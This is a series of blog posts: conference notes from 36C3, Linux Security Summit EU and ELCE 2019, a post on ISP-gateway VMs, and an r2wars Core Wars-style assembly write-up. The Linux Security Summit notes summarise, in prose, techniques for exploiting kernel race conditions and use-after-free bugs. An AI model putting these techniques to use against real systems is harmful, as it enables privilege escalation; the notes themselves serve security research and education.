USB is also a big attack surface when booting from storage or ethernet dongles. Often, descriptor parsing is wrong, with overflows or double fetches causing TOCTOU issues. In Grub, Tianocore and Seabios, memory corruptions and double fetches issues were found. Recent similar issues in proprietary devices include the Nintendo Switch bootloader issue and iPhone checkm8.

Another attack surface are SMM, for which many problems were found with UEFI Tianocore in the last 15 years. A recent issue was found in Coreboot, for which the range checks were simply not implemented yet.

If DMA is an attack surface (rogue device), IOMMUs are an absolute minimum to defend against the attacks. But then you should make sure that any data you get from a device is properly checked, so old driver code needs to be rewritten and audited. There might also be HW bugs in IOMMUs, sidechannels, data leaks, etc. In edkII (Tianocore), the spec mandates shutting down the IOMMU before chainloading to an OS, so it opens a huge window during which a rogue device can do attacks.

The next attack surfaces are glitching, which means injecting faults in the hardware clocks, voltage sources, or via lasers or EMIs. These hardware side channels are used to extract secrets. Some companies (Chipsec…) also provide optical ROM code extraction by decapping chips.

In conclusion, there's a surprising amount of low quality code in bootloaders (closed and open); and one often encounters NDA walls when looking at proprietary code. The advice is to minimize the image, and turn most extra features off. Enable basic exploit mitigations when compiling. In all of this, Tianocore is well ahead of the game.

The authors called the audience for action in reviewing, fuzzing, and analysing bootloaders.

That's it for 36C3 ! Most talks were recorded with videos already available.

Linux Security Summit Europe 2019

2019-10-31T16:00:00+01:00

Following my ELCE notes, you'll find below my notes for some of the talks the Linux Security Summit Europe 2019.

Exploiting race conditions using the scheduler — Jann Horn

The first bug Jann talked about is a race between mremap and fallocate. mremap allows moving a memory mapping from an address to another. The associated page table entries are moved as well, and then the TLB is flushed.

fallocate allocates and de-allocates space for a file. It interactes with the page cache so it's possible to exploit a race between the page table modification and the TLB flushing.

To widen the race-exploitation window, the scheduler is used. The approach is to pin two own tasks to the same CPU, and set on of the task to idle (low) priority; it's then possible to interrupt the idle task, even when it's inside the kernel, simply by having the other task being active. This is used to have a syscall take much longer that needed, and make the race window also last longer.

The second example is a refcount decrement on struct file.

Both userfaultd and FUSE allow handling page faults in userspace.

The kcmp syscall, made for checkpoint/restore in userspace is useful for reliable Linux user-after-free exploitation. It compares two processes' kernel resources (file descriptors) to determine if they are sharing pointers.

Combined exploitation then creates a FUSE mapping, open a writable file, make a write that then blocks to FUSE write, then open another RO destination file and verify that we reuse the same file structure with kcmp() before then resolving the FUSE page fault and writing to the destination (forbidden) file.

The third bug uses getpidcon(); it exploits an issue in Android binder that used the caller PID to get the context, before then making a decision based on this.

Here the race window is widened by creating an artificial priority inversion inside the kernel, which mutexes are vulnerable to. This is done by interacting with the VFS's mutexes with userfaultd.

Kernel Runtime Security Instrumentation — KP Singh

Signals from Audit or perf can correlate with malicious activity, but not necessarily. LSM errors and denies are Mitigations that deny certain actions. You need both to have security.

To detect a new attack, you need both an Audit update (to log new events), and a mitigation update (e.g new LD_PRELOAD signature).

KP gave a few examples of Signals: for example a process that runs and deletes its binary. For Mitigations, the first example was to have a dynamic whitelist of known Kernel modules. The point is that both go hand in hand, and you need both.

KP says they want to implement KRSI with eBPF; LSM hooks should be implemented as eBPF programs. The LSMs are a good match because they map to security behaviours, are associated with kernel data structures with "blobs", and benefit from years of research and verification of the LSM system. It also benefits the LSMs because the framework can then get extended from security analysts feedback.

With this eBPF infrastructures, both actions are possible on an LSM action: returning an error and/or logging an audit event.

The new BTF format helps with eBPF programs because now the addresses of symbols are distilled in a compact format, allowing to read inside kernel data structures in a version and platform-independent way.

KP showed an example BPF program to do the denial of unlinking its own executable (or a parent, or another process's), or to logging a write /proc/self/mem.

Compared to the landlock patchset, KP says that KRSI has different roles: the goal is to do system-wide MAC, not unprivileged DAC.

Performance-wise, the latency impact of KRSI is three times lower than audit, and with less variation.

Address space for namespaces — Mike Rappoport

Address space isolation is on of the best protection methods since the invention of virtual memory, Mike says.

Page Table Isolation (PTI) is the first example of this type of isolation. There are other work in progress, like KVM address space isolation or process local memory.

Mike's group at IBM wants to improve container isolation; a way to do that can be to assign dedicated page tables to namespaces.

Previously, they tried something called System Call Isolation (SCI), to run system calls with very limited page tables, but it didn't provide enough guarantees, and had a heavy performance impact. Another thing they worked on was mmap(MAP_EXCLUSIVE) to create private memory mappings that can't be accessed by the rest of the system. A similar thing was done with a char device mapping : can transfer the rights with SCM_RIGHTS, and doesn't need a new page flag.

The Address spaces for namespaces approach would have processes within a namespace sharing a page table, but their mappings wouldn't be available outside of that namespace. A first version was built for netns in order to have an isolated network stack for network namespaces. Even the internal kernel pages and objects aren't visible outside of the namespace. It required extending alloc_page() and kmalloc().

The proof of concept implementation still does not work, but there is good hope that it can be improved.

Using a different LSM from the Host in a Container — John Johansen

The main use case to have a different LSM in a container is cross-distro container running: e.g, Fedora (selinux) inside a container on Ubuntu(apparmor), or an Android (selinux) inside something else.

LSM Stacking is very similar to what needs to be done here, so one can leverage it for this use case.

But an issue John found is that LSM order matters. His first tries with apparmor (main LSM), then selinux (stacked) failed to boot, because in Ubuntu dbus is built with both apparmor and selinux. It finds that selinux is enabled, and then when initializing apparmor, it thinks it already has an (empty) policy. That was the first gotcha.

Then, another gotcha was selinux was blocking apparmor code.

There also needs to be a way to namespace LSMs: inside a chroot (or container), you don't an applied policy to impact the whole system.

In order to do that, Apparmor implements virtualization of parameters, policy, etc. That's the way to be namespace aware, and it will need to be done in every LSM.

Another issue that was encountered was securityfs, which isn't multi-mount capable, so a non-container aware image can't boot because it would fail to mountit.

It's also not possible to use seccomp and no_new_privs. So to work around that, AppArmor support for no_new_privs with stacking was added: at lockdown, the apparmor confinement is saved, and then checked again whenever necessary to make sure it's enforced properly.

Container nesting is also another issue. There are specifically issues around user namespaces: for example there's no way to know when a user namespace is created; new LSM hooks are probably missing to fix these issues.

It's now possible to run an Ubuntu container on Fedora, with the help of LXD (handling mappings, etc.).

Keylime: Open Source software for remote trust — Luke Hinds

Traditionally, software trust used to reside in memory or disks. TPMs changed this by providing hardware-backed software trust sources. They are now ubiquituous, and used pervasively accross various industries.

The basic model relies on an RSA keypair, with the private key being inaccessible to software. A TPM can hash critical sections of firmware, a boot process, and then those hashes can be made public and verified with the public key.

Keylime is a remote trust framework using TPMs. TPM 2.0 and 1.2 are supported, but the latter will be deprecated. It provides Measured Boot (for firmware, shim, grub, kernel, etc.), it can measure secure boot (EFI DBX, MokListX, etc.), and an IMA Runtime for attestation. It' possible to have encrypted payload execution, depending on the previous measurements, which would then unwrap appropriate keys. Keylime also has a revocation framework.

In the target node (IoT / Edge platform / Provider Cloud), the Keylime Agent runs, with the TPM software stack. On the trusted infrastructure, the Keylime server runs, with these components: Verifier, Registrar, Revocation Service, and Keylime CA.

It's possible to have many nodes, and multiple verifiers combinations.

Enrollment relies on the TPM-backed hardware keys. Once it is done, the keylime infrastructure (Verifier and Registrar) will provide a way for a tenant to access an enrolled node, and send it a cryptographically secure payload.

With IMA, it's possible to have continous remote attestations (with polling). When an attacker triggers an IMA error, the Keylime Verifier will notice, and the revocation mechanisms can kick in. The Keylime Verifier will send a signed revocation event to all nodes, for example to revoke trust to the compromised node.

The Keylime project is active, has documentation and working CI. Luke would of course like to have even more contributors.

The agent is being ported from Python to Rust for performance and security reasons. Support for virtual TPM (vTPM) is being worked on as well, while still binding it to the hardware TPM's cryptographic trust.

Securing TPM Secrets with Intel TXT and Kernel Signatures — Paul Moore

Paul's goal is to store secrets in the TPM, and only allow access to these secrets to authorized kernels. He also wants this to work on both UEFI Secure boot systems and legacy BIOS systems.

Sealing TPM secrets against a set of PCR values. These values are measured against system state with secure boot, in the firmware, bootloader, kernel, etc.

For UEFI Secure boot, PCR 7 is a hash of the kernel signing authority; it's stable across kernel updates with the same signer.

With Intel TXT, the hardware and firmware create a dynamic root of trust; it uses the tboot bootloader, which makes a hash of the kernel image. But that hash isn't stable across updates, so the PCRs are unstable.

So Paul's solution to this is to extend tboot to support the UEFI PECOFF signature format. Its verification is rooted in the TPM; and it then updates the PCRs.

The prototype code has been released.

There's still need to work on command line and initrd verification, but the solutions that were applied with UEFI secure boot could work.

That's it for this edition of LSS EU!

ELCE, OS Summit and KVM Forum 2019 notes

2019-10-31T00:00:00+01:00

After a two years hiatus, I couldn't miss this year's ELCE happening in Lyon, the first in France since 10 years ago in Grenoble, which coincidentally was one of my first conferences. OS Summit and KVM forum events are co-located and with the same ticket, which is nice, and why I attempted a few talks there as well.

Making device identity trustworthy with TPMs — Matthew Garett and Brandon Weeks

For access to any internal Google Service (BeyondCorp), both the user and the device need to be authenticated. The devices that are allowed need to be well-known and inventoried.

A device identity needs to be unique (serial number), bound to hardware and stable for the lifetime of the device. It also shouldn't be unforgeable and resistant to tampering.

Existing solutions are inadequate: self-identification can be forged, keys on disk can be duplicated, and trust bootstrapping is hard, especially remotely.

TPMs are specific chips that provide a store and generation for keys that never leave the hardware: they can't be extracted and duplicated to other hardware. Modern TPMs allow tracking the hardware manufacturer, thanks to endorsement keys (EK): they provide proof that a TPM comes from a certain manufacturer. Attestation Keys (AK) are then used to prove whether a key has been generated on a specific TPM.

An issue is that TPMs aren't directly related to devices. A solution to that is runtime binding: run a script that extracts the TPM EK and place in an internal database. But an issue with this is that you don't know if the device state is trustable at this time, or if the TPM is indeed internal to the device.

Binding at provisioning helps with this by reducing the window where a system could be compromised by having an IT officer do this operation before it's given to a user. But it's still dependent on having a well-functioning inventory system.

Binding at manufacture goes even further: it maps a given device with a TPM with the help of Platform Certificates. Those are sent out-of-band at device ordering.

The lifecycle then looks like this: - first, the device is provisioned: at this point an Attestation Key is generated by the TPM, and both the EK and AK are registered through the Attestation CA - then, a Client certificate is issued: it is signed by the AK - the client certificate is then provided to the access gateway as part of mutual TLS auth to access services.

Another possibility once you know how to bootstrap device trust, is to use TPM-backed trust to authentify services for example.

The low level code, including Platform Certificates parsing has been released here.

What's new in Buildroot — Thomas Petazzoni

Two years ago, LTS support was added: the february release is maintained for a year for security updates and bug fixes.

Internal toochain support has been updated, with new gcc, binutils, and various libc versions. They are now tested automatically for architectures supported by qemu. External toolchains have been updated as well. It's also now possible to declare external toochains from BR2_EXTERNAL.

Two new common package infrastructures were added for go and meson packages.

Git caching has been improved, for git-fetched packages; as well as the whole package download infrastructure which has been rewritten.

Many packages were updated, and added; a few obsolete ones have been removed.

New global options have been added to force building with security-related options (relro, stack protection, etc.)

A new make show-info was added to dump the state of enabled packages as a json to be used by external tools.

Work has been done to improve the testability of reproducible builds, as part as a GSoC: if BR2_REPRODUCIBLE=y, the build is done twice, and the outputs of the two are compared with diffoscope.

Work has also continued to improve parallel builds; one of the last series on the subject is on the per-package directories for HOST.

The runtime test infrastructure has been improved to add more tests. The tooling around buildroot has been augmented with the support of release-monitoring.org to track packages that are outdated.

Boot time optimization with systemd — Chris Simmonds

systemd runs as init, so it's PID 1. It launched and monitors daemons, configures stuff, etc.

For embedded systems, systemd is a much bigger init system, with 50 binaries and a 34MB footprint. It supports many features: event logging with journald, user login with logind, device management with udevd, etc.

systemd has many features for resource control, free parallel boot, can have a system boot without a shell etc. It has unit (a generic type), services (a given job), and targets (a group of services, e.g a runlevel).

systemd searches for units first in /etc/systemd/system for local configuration, then in /run/systemd/system for runtime config, then in /usr/lib/systemd/system .

Units can depend on each other, with three types of deps: Requires: describes a hard dependency, Wants: is a weaker one meaning it won't be stopped if the dep fails, and Conflicts:.

systemd also provides an other concept: ordering. Before: and After: determine when a unit is started. It's used for example when starting a unit web server after network.target. Without ordering, units are started in no particular order.

At boot, systemd starts the default.target. On most systems, this is by default a symbolic link to the multi-user.target.

It's also possible to describe a reverse dependency with WantedBy:, which is used to add services to be started by a target for example: WantedBy: multi-user.target. This is implemented by creating a symbolic link in the multi-user.target.wants directory.

systemctl is the cli tool used to interface with systemd at runtime.

How to reduce boot time then ?

Boot time is defined by the time to power on to running the critical app.

When using a generic system image (yocto, debian), those are designed conservatively to cater to all common cases. So to reduce boot time, one should make it less generic, either by disabling services, or reducing their dependencies.

The main tool to optimize boot time is systemd-analyze, that can give you a summary of the boot time; systemd-analyze blame list units by order of start-up time. The most important is systemd-analyze critcal-chain that shows the time for the units in the critical path.

In an example, Chris showed that the critical-chain depends on a timeout because of a non-existant ttyGS0, removing the associated getty unit saved a lot of time. Changing the default target and disabling unused daemons also helped a lot.

Other useful features in embedded systems

The watchdog is a very useful feature of systemd: if a service does not reply to watchdog, it can be restarted automatically. It's even possible to force a reboot if the watchdog has been triggered a certain amount of time above a given threshold.

Resource limits like CPU and memory limiting can also be very useful; this is implemented through cgroups.

Crypto API: using hardware protected keys — Gilad Ben Yossef

In the Linux crypto API, there are transformation providers, that can either use dedicated hardware, specialized instructions or a software implementation. There are used by the crypto user API, dm-crypt or ipsec for example.

The crypto API is used in multiple steps - crypto_alloc_skcipher, for example to get xts(aes) transformation handle - set key to tfm - get a request handle - set request callback - set input, output, IVs, - etc.

Tranformation providers have a generic name (the algorithm), a driver name (the implementation), and a priority, to know which is most important. There are other properties describing the synchronicity, min/max keysize, etc.

The key is usally just stored in RAM, like everything else. It makes it vulnerable to various key-extraction attacks. It should be possible to have a transformation provider that support a hardware-backed key.

It was implemented a few years ago for IBM mainframes, which means that the infrastructure could be reused for embedded devices.

In the implementation, it means the user of the API would pass a tag instead of the key bytes. The tag describes a storage and key from inside a secure domain. The tag can be an index, or an encrypted key in case of key ladder.

In practice the security of this key depends on the security of the secure domain (hardware or software, e.g tee), its provisioning, etc.

The cipher's name is prefixed with 'p', for example "paes", for protected key. Because the tag value is specific to hardware implementation, when requesting a cipher, the specific name of the driver is used instead of just the algorithm name.

When instantiating it with dm-crypt, one should use the crypto-api algo driver name and instead of the key, a tag describing the key (e.g key slot).

A future challenge is that TPMs act very much in the same way, yet aren't using the same API.

iwd - state of the union — Marcel Holtmann

iwd 1.0 has been released on this day (October 30th 2019)

Marcel says Wi-Fi on Linux sucks. It's because the roles are split between many projects (kernel, wpa_supplicant, dhcpcd, network manager, etc.), and there's still a lot of code to write on top of this to ship a consumer product.

iwd's goal is consolidate the wifi information in one place, which is then used by network-manager. The goal is to only have one entity interacting with nl80211 for better performance.

For example, when you wakeup your laptop, you don't want to rescan the ever-growing list of channels before re-joining a network.

In addition to being the central known-network database, iwd has many features: - it has optimized scanning since it's the only daemon to do scanning in a system - it can do enterprise provisioning - supports fast roaming and transitions - it supports WPA3 and OWE (Opportunistic Wireless Encryption), and no UI change was needed to add this support - there's an integrated EAP engine that uses the kernel keyring system - it support the hotspot 2.0 spec - push-buttons method work (WPS, etc.) - address randomization is supported - AP mode is supported to do tethering

Enterprise provisioning can be very complex. Most OSes have a lot of settings that are hard to manage, etc. With Windows 10 and iOS there's now a downloadable configuration file, like for OpenVPN for example.

iwd has now support for configuration files with embedded certificates so that everything can be in a single file. An enterprise admin can now provide this configuration, the user installs it, and connects to the network. This format in documented in the manpage man iwd.network.5. Unfortunately, there's still no standard for Wi-Fi provisioning, and Marcel wants to address that.

Marcel says that in some cases, just the overhead of communicating with other daemons (systemd-networkd, connman or network-manager) in order to trigger dhcp, is too big. Some systems also don't necessarily have those daemons. That's why iwd added support for an experimental DHCPv4 daemon. This is documented in iwd.config.5.

The goal with iwd is to complete a connection in 100ms or less (with an IP address). Right now, it's not there yet. PAE in the kernel nl80211 interface helps reducing this. Address randomization adds 300ms on top of this. In Android, it can add up to a 3s penalty, because one needs to power down the phy and power-it up again with Linux. There's work in the kernel to reduce this time as well, but it's not there yet Marcel says.

iwd does not depend on wpa_supplicant, and has improved a lot.

Marcel says they have reached the limit of what is possible to improve inside iwd. There needs to be other features in nl80211 to continue doing optimizations.

iwd has 40k SLOC, which might be a lot, but only a tenth of wpa_supplicant.

There are other daemons in the work: ead for ethernet authentication; its code is in the repo, and still being worked on.

apd, the access point daemon is still private and being prototyped and should land next year in the repo.

rsd is a resolving service daemon is pretty much a replacement for systemd-resolved; the DNS part is quite tricky according to Marcel; the goal is to be able to chose the correct path (e.g through a proxy or not) for a given URL. It's not planned to be released anytime soon though.

VirtIO without the Virt: towards implementations in hardware — Michael Tsirkin

virtio enables re-utilisation of drivers that are already in the OS. There are already many types of devices that are supported.

Hardware helps implement userspace drivers, that can also be simpler. Another motivation for hardware virtio would be passthrough for performance, while retaining the advantages of software implementations.

If there is a precise virtio spec, when a bug happens it's possible to find if it's the fault of the driver or the card. If you have hardware, you can switch to a different card or software implementation to find out.

Virtio feature negociation allows implementing only certain features in the driver or hardware, and then use only the intersection.

For virtio-net, the virtualized hardware uses PCI, so it's possible to forward guest access to real hardware by giving it access directly to hardware memory range for example.

Virtio ring has a standard lockless access model that looks a lot like DMA systems that hardware vendors are used to implement.

Depending on the hardware, there might be cache coherency issues, which means that hardware has a different feature flags, in particular VIRTIO_F_ORDER_PLATFORM and VIRTIO_F_ACCESS_PLATFORM. Version 1 needs to be implemented as well, without the legacy interface.

The simplest way to implement hardware virtio is to just use passthrough; for example, if a network card implements the spec properly, just pass-through everything. Another possibility is to only have data path offloading: the control path is intercepted in an mdev driver.

It would also be possible to do partitioning in the last case, by tagging requests for a given virtqueue depending on each VM if we want to share a device between VMs. Another use of the mdev driver is for migration: force it to a matching subset of features between two machines, and then do the migration between the two transpararently.

If there are device quirks, the best way to address that is to use feature bits instead.

Virtio 1.2 spec plans to be frozen by end of November 2019. When a adding a device to the spec, and ID should be reserved, and a flag for new features.

Authenticated encryption storage — Jan Lübbe

It's possible to integrate authentication and encryption at various layer of the storage stack, from userspace, filesystems&VFS to device-mapper.

With dm-verity, a tree of hashes is built, and the root hash is provided out-of-band (kernel command line), or via signature in super block since Linux 5.4. It's the best choice for read-only data.

dm-integrity arrived in Linux 4.12, and provides integrity for writing as well. There's one metadata block for n data blocks, and they are interleaved. It needs additional space, and has a performance overhead, because a write happens twice because of journalling (for both data and metadata) to prevent power issues.

dm-crypt handles sector-based encryption with multiple algorithms. It's length preserving, which means that data cannot be authenticated. It's a good choice for RW block devices without authentication.

Recently, dm-crypt added support for authentication as well with AEAD cipher modes. But it authenticates individual sectors, so replay is possible (is it the last version ?). The recommended algorithm is AEGIS-128-random.

fsverity is now "dm-verity for files", and has been integrated into ext4. A single (large)file has root hash (provided out-of-band), and once written, is then immutable. Biggest user is likely Android for .apk files.

fscrypt has the same idea of encryption at the file level. It's interesting for a multi-user system where each user has its own keys. It's possible to mount a filesystem and remove files without having the keys. It also has no authentication.

Since Linux v4.20, UBIFS can provide authentication. The root hash is authenticated via HMAC or signature since Linux 5.3. It's the only FS that authenticates both data and metadata. It's the best choice for raw NAND/MTD devices.

ecryptfs is a stacked filesystem (mounts on top of another fs), and was used by Ubuntu at some point for per-user home directory encryption, but has now been superseded by fscrypt.

IMA/EVM was initially developed for remote attestation wit TPMs, and uses extended attributes. It protects from file data modification, but it is vulnerable to directory modifications (file move/cp).

Master key storage is also problematic, and platform dependent. Many SoCs provide key wrapping to encrypt secrets per-device, but it needs a secure boot chain. Other possibilities include using a TPM or (OP-)TEE.

Authenticated writable storage can only detect offline attacks, not runtime ones, so there's the need to have RO part of the system (recovery) in order to be able to restore the system in a good state.

How to analyze device problems from devices that are returned from the field ? There might be the need for a mode to erase the keys (protects the data) and disable authenticated boot (for HW analysis).

That's it ?

If you want more notes, I invite you to read Arnout Vandecappelle's at Mind Embedded Development's blog.

I'm also attending Linux Security Summit, so stay tuned!

What are you working on ?

2019-10-20T00:00:00+02:00

This was previously published on LinkedIn

Until very recently I couldn’t really answer this question. But it has shipped, so now I can tell you: I've been working on Edge Computing.

To be more precise, this is the first compute service available to ISP subscribers directly on their ISP gateway.

Those of you that read my LinkedIn profile know that I work on the consumer-facing boxes of the french ISP called Free, at the Iliad subsidiary called Freebox. Free is often credited as the inventor of ADSL triple-play, and has been making its own hardware with Freebox for almost 20 years now. The latest gateway/set-top-box triple play offer is called Freebox Delta and is relatively high-end; non-french readers can find a good overview of the Freebox Delta at Engadget. The gateway, Freebox Server, ships with RAID, 10Gbps support, wifi with 160Mhz bands, lots of NAS features, etc. And now it's first ISP gateway to also provide compute, via installable VMs, available to subscribers.

You can use it to host your personal cloud, home automation, multimedia server, etc. It's truly generic compute, with an arm64 OS, so your imagination is the limit. I'm already using it at home to run a few services that were on a Raspberry Pi: it's much faster thanks to the 64-bit OS, and more reliable than microSD cards.

It's built on top of QEMU and supports cloud-init, USB passthrough, remote display, and lot of other small goodies. In the process of building it, I found two QEMU bugs (one of which danpb fixed upstream in QEMU 4.1.0), two ubuntu bugs and released a debug tool for websocket ttys.

You'll find some of the coverage of this release in french here, with quotes from yours truly, as well as the article that was published on the Freebox developers blog (french).

Install of a VM

r2wars 2019

2019-09-08T00:00:00+02:00

You might have noticed I was at r2con 2019. This is my writeup for the r2wars 2019 challenge.

r2wars primer: a Core Wars-like game

In radare2, there's an intermediate language and VM called ESIL. It is used to emulate code, and supports many architectures. r2wars is built on top of r2's ESIL VM, so it supports any ESIL instruction sets, for example x86-32, mips-32 or arm-64.

Since it's based on Core Wars, in r2wars two opponents create "bots", short assembly programs, which are executed one after the other, in the same memory space, thanks to ESIL emulation. The goal is be the latest to survive; usually by wiping your opponent so that it executes and invalid instruction.

The ESIL vm is initialized with a 1024 bytes memory space plus a stack (more on that later), and the two opponents are placed randomly in this space. They are executed in round-robin: one after the other, one instruction each. A particularity is that you can have an opponent using a different architecture, since multi-architectures combats are supported: you only share the memory space, not the CPU state (registers). The server makes sure your memory does not overlap your opponents' at launch; afterwards, all bets are off. The CPU state is dumped after each instruction, to let the opponent run, and then restored before running the next instruction.

A contestant's bot looses when it attempts to:

execute and invalid instruction
write or read outside of the arena or stack
execute instructions outside of the arena
trigger an interrupt, trap, io error or exception.

The most reliable way to win is therefore to trigger one of the previous condition for the opponent by overwriting where it executes. But an other strategy could also be to survive until the other one suicides.

You send the source of your bot to the organizers ; the r2wars software is built in mono with a web interface, and automates the following tasks: it uses rasm2, the radare2 assembler to build your bot, it launches radare2, initializes ESIL, then launches 1v1 matches in a tournament, to determine the global ranking.

The challenge is ran over the two days of r2 con, with tournament runs at 10am, 2pm, and 5-6pm. So one has 5 runs to perfect their bot (with small prizes after each), and one final run for the final ranking.

Initial approach

I'm not a beginner to this challenge, since I participated last year; so my first idea was to simply to take my last bot, which ranked second last year, and submit it. Here is the commented arm64 assembly source:

adr x0, start          ; get address of start label with pc-relative adr instruction
mov x3, 1008           ; put relocation address in x3 (just before the end of arena)
neg x5, x0             ; put some value looking like ffffff in x5 for writing
mov x4, x5             ; copy x5 to x4
ldp x1, x2, [x0]       ; load code at start label into x1 and x2 (2 4-bytes instructions in each)
stp x1, x2, [x3]       ; store code to relocation address
br x3                  ; jump to the core loop at the relocation address
start:
stp x5, x4, [x3, -16]! ; decrement x3 by 16, then store 16 bytes of data (x5 and x4) in address pointed by x3
stp x5, x4, [x3, -16]! ; same write 16 bytes + pre-decrement
stp x5, x4, [x3, -16]! ; same write 16 bytes + pre-decrement
b start                ; loop with relative backward jump

The core of this bot is 4 instructions, with a small setup to relocate the bot at the end of memory. Once the whole memory is overwritten, this bot makes a write to invalid address (x3 underflows) and dies.

I reused my workspace from last year meaning I could immediately do debug runs in radare2, but I had to reinstall the official mono builds (the only ones that work with r2wars) to run the game simulations.

I mildly tested my bot in radare2 (it worked, like last year), and submitted it immediately once my plane landed so that I could do the first round. I didn't want to spend to much time on it this year and wanted to follow more talks.

First roadblock

I got a message from the organizer asking me if I tested my bot. Hmmm, my spidey sense told me this wasn't a good sign. Of course, I tested it in radare2, it did overwrite the whole memory.

But as the first round came, something weird happened. It seemed like my bot committed suicide after only a few cycles. Did I miss something or trigger an exception ? I tried it again, and found I was able to reproduce the problem in r2wars, so I went to see the organizer to ask for help. It seemed the problem was only reproduced when running the bot in r2wars; the only difference with my testing script, is that r2wars needs to save and restore the CPU state after each instruction to execute each contestant in round-robin.

Very soon, skuater had a minimal reproducer of the issue, which helped pancake issue a fix. It was an underflow on restoration of the zero-register (x31), which instead of being ignored, triggered writes side-effects in x0, corrupting it.

I took some time for the fix to propagate to the machine used to run the tournament, so I missed the next two rounds of the day as well: not such a big issue since it gave me more time to follow the talks and socialize.

Reminescence

I took some time to try out an idea I had last year and for which I had submitted an ESIL patch: the single instruction bot, that consisted of only one instruction, that writes itself at the next address with a post-increment:

adr x0, start
ldr x1, [x0]
str x1, [x2]
br x3
start:
str x1, [x2, 4]!
str x1, [x2, 4]!

It still needs to write 8 bytes (two identical instructions), but it's effectively only using one at a time. It takes advantage of the fact that all registers (here x2 and x3) are initialized to zero.

While the bot did work, it wasn't very effective in my simulations, since the smaller footprint (4 bytes at a given time) wasn't worth much lower write throughput, which seems to be a core metric (but not sole, as we'll see later) in bot performance.

Insomnia

I didn't mean to, but it was bound to happen. I couldn't sleep, despite waking up at very early to catch my morning flight.

It occurred to me that I could simply workaround the radare2 issue by changing the register allocation in last year's bot: the bot was, after all, only using six out of thirty-one available registers on aarch64.

So I changed the bot to use different registers. It did work with a buggy radare2. But it wasn't enough.

I couldn't just keep testing against my simple bots, so I decided to do simulations against some of the best contestants from last year. Some had been published on github, so I downloaded them for simulation.

And they were still better. So I changed strategies... Along the way, I tried changing the loop to have one restore between each instruction, as well as delaying the relocation as much as possible, in order to beat other bots that would relocate at the end, like ik4ru5. In retrospect, the former (continuous restoration) was a mistake: it divided write throughput by 3, which is a hard blow to the bot performance.

Here, you can see how I duplicated the relocation code store instruction in order to delay the main loop as much as possible:

adr x10, start
mov x13, 1008
mov x14, x13
sub x5, x5, 1
mov x4, x5
ldp x11, x12, [x10]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
br x13
start:
stp x11, x12, [x13]
stp x5, x4, [x14, -16]!
stp x11, x12, [x13]
b start

It did provide better performance against ik4ru5 and t_pageflt, but neither of them were participating in this year's r2 wars… So the result the next day on the first round wasn't really good:

I ranked 6 out 12.

Intelligence

Luckily, I had decided to fully record this round (or as much as possible) in order to gather intel on how the other bots exactly worked. I just couldn't continue going blind since there was only two tournament runs, which wouldn't provide a good feedback loop for bot improvement.

I recorded videos and took a few photos in order to have a view on every participant, then decided to rewrite the top-5 bots from scratch. I first thought of using the assembly source, but since the r2 disassembler converts relative addresses (jumps, etc.) to absolute addresses, it would be hard, so I "simply" copied the hex code of each instruction into .hex directives for the assembler. It wasn't that simple though, as the quality was sometimes less than optimal:

The challenge for next year would be to automate this task with OCR or Google Lens.

After a few typos, I finally had the code of the other top-5 contestants for this tournament iteration. I just had to hope that they wouldn't modify their bots too much before the next run.

Without surprise, they were very good, and were beating all the bots I had ever written (mostly). It might have stemmed from the pushal strategy that all the x86-32 employed: this instruction enables a throughput of 32 bytes per ESIL cycle, twice the 16 bytes per second of arm64 stp.

So I ran more simulations and iterated over the bot from last year.

Improvements

After a few iterations (not shown here), here is the bot that had a good win-rate in simulations (5 out of 5 adversaries). You can see it has many small changes:

adr x10, start             ; 1
mov x2, 512+32             ; 2 - heuristic
mov x8, 0x180              ; 3 - heuristic
mov x9, 0x180              ; 4 - heuristic
ldp x11, x12, [x10], 16    ; 5
ldp x14, x15, [x10]        ; 6
stp x11, x12, [x9], 16     ; 7
stp x14, x15, [x9]         ; 8
br x8                      ; 9
start:                     ; 10
and x2, x2, #0x3f0         ; 11 - looping with a modulo
stp x11, x12, [x2], 16     ; 12
stp x14, x15, [x2], 16     ; 13
stp x11, x12, [x2], 16     ; 14
stp x14, x15, [x2], 16     ; 15
stp x11, x12, [x2], 16     ; 16
stp x14, x15, [x2], 16     ; 17
b start                    ; 18

From line 2 you can see that something changed: I've split the main heuristic of relocating to the end of memory and writing from there into two: now the relocation address is at 384 bytes, and the start of writing address is 544.

The main loop (line 10-18) is now 8 instructions instead of 4, so it needs to be loaded with two ldp (line 5-6), and stored with two stp (line 7-8). Both used post-increment instead of pre-increment addressing.

In the loop, you see that we repeat the two stp in line (12-17): that's because we now write the bot itself all over memory, instead of 0xFF. I found this was just as efficient as 0xFF against x86 bots, and luckily, there was no arm64 participant this year !

Finally, this bot never dies by itself: as you can see the first instruction is an and in order to only keep the lower bits of the write address register x2. We need to make sure at the end of the of the loop that we finish with 0x400 in x2; this has a consequence of limiting the choices of the write-start heuristic (must be in the form n*96+64), and we absolutely need to use a post-increment instead of a pre-increment to detect the overflow before writing out of the arena.

Since this bot was unbeatable in my simulations (except by some arm64 bots with different heuristics) against "real" bots, I was very confident, and submitted my new iteration to the organizer, full of hubris:

But unfortunately, it wasn't the winner of the next round either, although it came close:

This was mostly because the CAP had improved his bot again, and we were now very close in terms of performance. I missed the beginning of this tournament round, so I don't know which which combat round was lost or why.

Interlude: funny bots spotted

During the first tournament round of the second day, we noticed something weird: an x86 bot was quite big, and took a lot of cycles of doing almost nothing:

Turns out the bot was writing a message on screen, which took lots of cycles to write, because it was encoded in a bitmap that needed to be decoded. This bot had little chance of survival, in addition to triggering the timeout (4000 cycles), before finishing the full message, which I was told needed ~6000 cycles to complete. But a colleague of the author of PROSTmahlzeit was kind enough to submit the surviv0r bot so that it would get a chance to write its message. It was noticed by the organizers, and he got the prize he asked for :-)

Then, on the next tournament run, someone copied the idea, but implemented it in mips:

No bitmap though here since every address is hardcoded, making for a huge bot :-)

ARMv7 explorations

Over lunch, I was reminded of an ARMv7 instruction a colleague told me about: stmia and its ldmia counter part. These are used to store/load a set of registers with a post-increment of the address register. They're usually used for stack push/pop, fast memcpys, or context switching.

More importantly, it means you can reach a write throughput of 64 bytes per cycle (32 bits * 16 registers). So I modified my workspace to add support for arm32 bots and wrote a simple bot. Unfortunately, the post-increment in stmia did not work in ESIL.

